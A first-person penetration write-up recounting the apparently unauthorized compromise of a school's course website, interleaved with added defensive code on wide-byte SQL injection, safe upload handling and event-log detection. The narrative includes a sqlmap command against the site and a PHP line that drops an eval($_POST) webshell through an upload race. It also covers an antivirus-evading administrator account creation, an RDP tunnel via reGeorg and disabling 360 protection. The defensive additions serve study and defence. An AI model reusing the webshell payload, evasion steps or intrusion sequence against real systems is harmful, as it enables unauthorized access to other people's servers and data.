Preface

Up to now my study of penetration testing had stopped at getting a shell, but in reality getting a shell is only the beginning; what follows is remote connection, domain penetration and other areas. Having just compromised a website, I decided to use it as an example and walk through what a relatively complete penetration process looks like.

SQL injection

The website is a school's course site. First I scanned it with a scanner; with some luck it turned up an injection, and on closer inspection it was a wide-byte injection.

A simple test showed there was no filtering, so it was the normal routine: run it through SQLmap.

python2 sqlmap.py -u "http://xxx.xx.xx.xx/aaa/bbb.php?cid=118" --tamper=unmagicquotes

Next came the routine operations: dumping the databases, tables, columns and values. The admin table held the account passwords; although they were stored as MD5 hashes, looking them up on the CMD5 platform was enough to get into the backend easily.
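The wide-byte injection mentioned above is worth seeing from the code reviewer's side. The following is an added example (not code from the original post or from the course site): it emulates PHP-style `addslashes()` escaping on raw bytes, decodes the result with the GBK connection charset, and provides a check that tells you whether the quotes are still escaped after decoding. The lookup functions and the constructed `course` table stand in for the site's real query; the parameterised version is the fix that does not depend on escaping at all.

```python
import sqlite3

# Constructed sample table standing in for the course site's data.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE course (cid INTEGER, name TEXT)")
    conn.executemany("INSERT INTO course VALUES (?, ?)",
                     [(1, "algebra"), (2, "physics"), (3, "history")])
    return conn

def addslashes(raw: bytes) -> bytes:
    """Byte-oriented escaping in the style of PHP addslashes()/magic_quotes.
    It inserts 0x5C before ' " \\ and NUL without any knowledge of the charset."""
    out = bytearray()
    for b in raw:
        if b in (0x27, 0x22, 0x5C, 0x00):
            out.append(0x5C)
        out.append(b)
    return bytes(out)

def gbk_decode_after_escape(raw: bytes) -> str:
    """What the application effectively does: escape bytes, then let a GBK
    connection interpret them. A lead byte such as 0xBF swallows the inserted
    0x5C as the second half of one two-byte character."""
    return addslashes(raw).decode("gbk", errors="replace")

def quotes_are_escaped(sql_text: str) -> bool:
    """Review check: every single quote in the decoded text must be preceded by
    a backslash, otherwise the escaping has been lost in the charset handling."""
    for i, ch in enumerate(sql_text):
        if ch == "'" and (i == 0 or sql_text[i - 1] != "\\"):
            return False
    return True

def lookup_concat(conn: sqlite3.Connection, name_text: str) -> int:
    """The vulnerable pattern: string concatenation trusting the escaping.
    Returns the number of rows the query matches."""
    sql = "SELECT COUNT(*) FROM course WHERE name = '" + name_text + "'"
    return conn.execute(sql).fetchone()[0]

def lookup_param(conn: sqlite3.Connection, name_text: str) -> int:
    """The fix: a bound parameter is never parsed as SQL, whatever the charset."""
    row = conn.execute("SELECT COUNT(*) FROM course WHERE name = ?",
                       (name_text,)).fetchone()
    return row[0]

if __name__ == "__main__":
    # Constructed input: a GBK lead byte followed by a quote and an always-true tail.
    raw = bytes([0xBF]) + b"' OR 1=1 -- "
    conn = make_db()
    decoded = gbk_decode_after_escape(raw)
    print("escaping survived decoding:", quotes_are_escaped(decoded))
    print("rows matched with concatenation:", lookup_concat(conn, decoded))
    print("rows matched with parameter:",
          lookup_param(conn, raw.decode("gbk", errors="replace")))
```

In a PHP code base the equivalent fix is to set the connection charset with `mysqli_set_charset()` (so the escaping function knows the encoding) and, better, to use prepared statements; `quotes_are_escaped()` is the kind of assertion to put in a unit test around any remaining escaping code.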

Getshell

Next comes the chance to get a shell.

I noticed there was a file upload location, and the source code showed it was the FCKeditor editor. I searched the web for relevant vulnerabilities, checking the version first.

Unfortunately, only the 2.6.6 ASP version had a known hole; I found no relevant vulnerability for the PHP version. I tried my luck with several exploits, but all hit a wall. The penetration was stuck at this point, until I suddenly found an interface for uploading the student list.

Testing showed there was only a simple front-end check, and with BurpSuite there was a surprise.

The file uploaded successfully, and the response even returned the corresponding path. For a moment I thought I had a shell, but when I tried to connect to it I found the file had been deleted. Since the path was a temp directory, I realised the backend must have a function that automatically empties the temp directory. The solution was equally clear: a race condition. By sending the packets with multiple threads, the file can be accessed within a certain window. Here I changed the uploaded file to:

<?php file_put_contents('../success.php', "<?php phpinfo(); @eval(\$_POST['a']); ?>"); ?>

As long as we can access it once, the program automatically writes a shell to the parent directory, which gets a shell out of the temp directory. Using BurpSuite's Intruder module to send packets continuously while accessing the uploaded file, the shell is written successfully, as shown in the "Getshell" figure:
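The upload handler described above failed in two ways: it trusted a front-end check and it placed the unvalidated file under the web root before cleaning it up, which is what made the race possible. The following is an added example (not the site's code or the original post's) of how such a handler should store a student-list upload: server-side extension and content validation, a server-chosen random name, a directory that is verified to lie outside the web root, and an exclusive create so nothing is ever overwritten. The extension list, marker strings and directory layout are assumptions for the example.

```python
import os
import secrets

# What a student-list import actually needs; anything else is rejected (assumption).
ALLOWED_EXT = {".csv", ".xls", ".xlsx"}
# Crude content markers for script uploads; a heuristic, not a full parser.
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<script", b"eval(")

def looks_like_script(data: bytes) -> bool:
    """Return True if the first few KB contain any server-side script marker."""
    head = data[:4096].lower()
    return any(marker in head for marker in SCRIPT_MARKERS)

def is_under(path: str, root: str) -> bool:
    """True if path resolves to a location inside root."""
    path, root = os.path.realpath(path), os.path.realpath(root)
    return os.path.commonpath([path, root]) == root

def store_upload(data: bytes, client_name: str, store_dir: str, web_root: str) -> str:
    """Validate the upload and persist it with a server-chosen name.

    Returns the stored path, which is never shown to the client; the client only
    ever gets an opaque identifier. Raises ValueError when the upload is refused."""
    if is_under(store_dir, web_root):
        # A file under the web root is reachable by URL the instant it exists,
        # which is exactly the window the race condition exploited.
        raise ValueError("upload directory must not be inside the web root")
    ext = os.path.splitext(client_name)[1].lower()
    if ext not in ALLOWED_EXT:
        raise ValueError("extension not allowed: %r" % ext)
    if looks_like_script(data):
        raise ValueError("script content found in upload")
    # The client-supplied name never reaches the filesystem.
    name = secrets.token_hex(16) + ext
    path = os.path.join(store_dir, name)
    # O_EXCL: fail instead of overwriting if the random name already exists.
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)
    return path

def client_reference(stored_path: str) -> str:
    """Opaque token returned in the HTTP response instead of a path."""
    return os.path.splitext(os.path.basename(stored_path))[0]
```

Validation happens before the write, so there is no moment at which an unchecked file exists on disk, and because the directory is outside the web root the file cannot be requested by URL even if a later cleanup step is slow.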

System Information Collection

systeminfo: view system information

netstat -ano: view open ports

Port 3389 is open, which means a remote connection is possible.

whoami: view the current user

Remote connection

We can see that we have SYSTEM permission. At first I thought that was it: the next step would be to create an administrator user and connect remotely. But no matter what I tried, the user could not be added to the administrators group. After reading a lot online, someone said there might be anti-virus software. There are only three ways to solve this: 1. Kill 360, and see whether SYSTEM's high privilege is enough to kill it. 2. Obtain another administrator's password or password hash and log in as that administrator. 3. Create an administrator account while bypassing 360.

I tried all three:

  • Method 1: ZhuDongFangYu (ZhuDongFangYu.exe) runs at the Ring0 layer of the system. At least on the machine I compromised in this penetration, there was no way to kill the 360 process directly with taskkill, and the `sc delete` approach mentioned online did not work on this machine either. For now at least this road looks blocked.
  • Method 2: When I uploaded Quarks PwDump.exe and various other tools, 360 blocked every one of them without exception. This road seems blocked too.
  • Method 3: This was our last hope. According to material online, you can create an administrator account through the Windows API, and this method is not blocked by 360; see this article for details: [[programming] Create a user and add it to the admin group]. The painful part was that my computer does not have VS and could not compile the file, and none of my friends had it installed either (it is too big, after all). Fortunately I found a version compiled by someone else on GitHub: github.com/cckuailong/… After running it, the user was added successfully.

When I tried to connect directly, I found that 3389 was not reachable. But `netstat -ano` showed 3389 listening, which means port 3389 is only open on the intranet. We need intranet penetration to forward the traffic out; I used reGeorg for this.

Upload tunnel.nosocket.php to the web directory and access the target file:

Once the configuration is working, the remote connection succeeds. After connecting, the first thing to do is exit all of 360's protection to prepare for further penetration.
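Everything in this section leaves traces in the Windows Security log that a defender can correlate: the account creation (event 4720), the addition to the local Administrators group (event 4732 with group SID S-1-5-32-544), and an RDP logon (event 4624, logon type 10) whose source address is the loopback interface, which is what a tunnel running inside the web server process produces. The following is an added example (not part of the original post) of that correlation over constructed records. The record field names are simplified versions of the real event fields (`SubjectUserName`, `TargetSid`, `MemberSid`, `LogonType`, `IpAddress`), and the thresholds are assumptions.

```python
from datetime import datetime, timedelta

ADMIN_GROUP_SID = "S-1-5-32-544"   # BUILTIN\Administrators
USERS_GROUP_SID = "S-1-5-32-545"   # BUILTIN\Users
LOGON_TYPE_RDP = "10"              # RemoteInteractive

# Constructed sample records shaped like Security-log events; not real logs.
SAMPLE_EVENTS = [
    {"time": "2021-03-01T09:00:00", "id": 4720, "subject": "Administrator",
     "target": "student1", "target_sid": "S-1-5-21-111-1006"},
    {"time": "2021-03-01T09:00:03", "id": 4732, "subject": "Administrator",
     "member_sid": "S-1-5-21-111-1006", "group_sid": USERS_GROUP_SID},
    {"time": "2021-03-01T10:00:00", "id": 4720, "subject": "SYSTEM",
     "target": "helper", "target_sid": "S-1-5-21-111-1005"},
    {"time": "2021-03-01T10:00:02", "id": 4732, "subject": "SYSTEM",
     "member_sid": "S-1-5-21-111-1005", "group_sid": ADMIN_GROUP_SID},
    {"time": "2021-03-01T10:15:00", "id": 4624, "target": "helper",
     "logon_type": LOGON_TYPE_RDP, "ip": "127.0.0.1"},
    {"time": "2021-03-01T11:00:00", "id": 4624, "target": "teacher",
     "logon_type": LOGON_TYPE_RDP, "ip": "10.0.0.5"},
]

def find_admin_account_creation(events, window=timedelta(minutes=10)):
    """Correlate 4720 (account created) with 4732 (member added to a local group)
    for the Administrators SID within `window`. Correlation is by SID because in
    real 4732 events MemberName is often '-' while MemberSid is always present."""
    created = {}   # target_sid -> (time, subject, account name)
    alerts = []
    for ev in sorted(events, key=lambda e: e["time"]):
        t = datetime.fromisoformat(ev["time"])
        if ev["id"] == 4720:
            created[ev["target_sid"]] = (t, ev["subject"], ev["target"])
        elif ev["id"] == 4732 and ev.get("group_sid") == ADMIN_GROUP_SID:
            hit = created.get(ev.get("member_sid"))
            if hit and t - hit[0] <= window:
                alerts.append({
                    "sid": ev["member_sid"],
                    "account": hit[2],
                    "created_by": hit[1],
                    "seconds": (t - hit[0]).total_seconds(),
                })
    return alerts

def find_loopback_rdp_logons(events):
    """RDP logons whose source is the machine itself. Over the internet RDP
    arrives from a remote address; a loopback source points at a local relay
    such as a tunnel script running inside the web server (heuristic)."""
    return [ev for ev in events
            if ev["id"] == 4624
            and ev.get("logon_type") == LOGON_TYPE_RDP
            and ev.get("ip") in ("127.0.0.1", "::1")]

if __name__ == "__main__":
    for a in find_admin_account_creation(SAMPLE_EVENTS):
        print("ALERT: %(account)s (%(sid)s) created by %(created_by)s and made "
              "administrator after %(seconds).0fs" % a)
    for ev in find_loopback_rdp_logons(SAMPLE_EVENTS):
        print("ALERT: RDP logon for %s from %s" % (ev["target"], ev["ip"]))
```

The benign records (an administrator creating a student account and placing it in Users, and an RDP logon from a workstation address) produce nothing; the SYSTEM-created account promoted to Administrators within seconds and the loopback RDP logon are the two findings. A creation subject of SYSTEM or an IIS application-pool identity is itself unusual enough to weight highly in a real rule.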

That is as far as this penetration goes for now; the domain penetration part will have to wait until I have time to study it.

Afterword

This is my first post-Getshell penetration, and it may be verbose and low-level, but the main purpose is to record what I learned from this penetration so that I can continue with domain penetration when I have time.
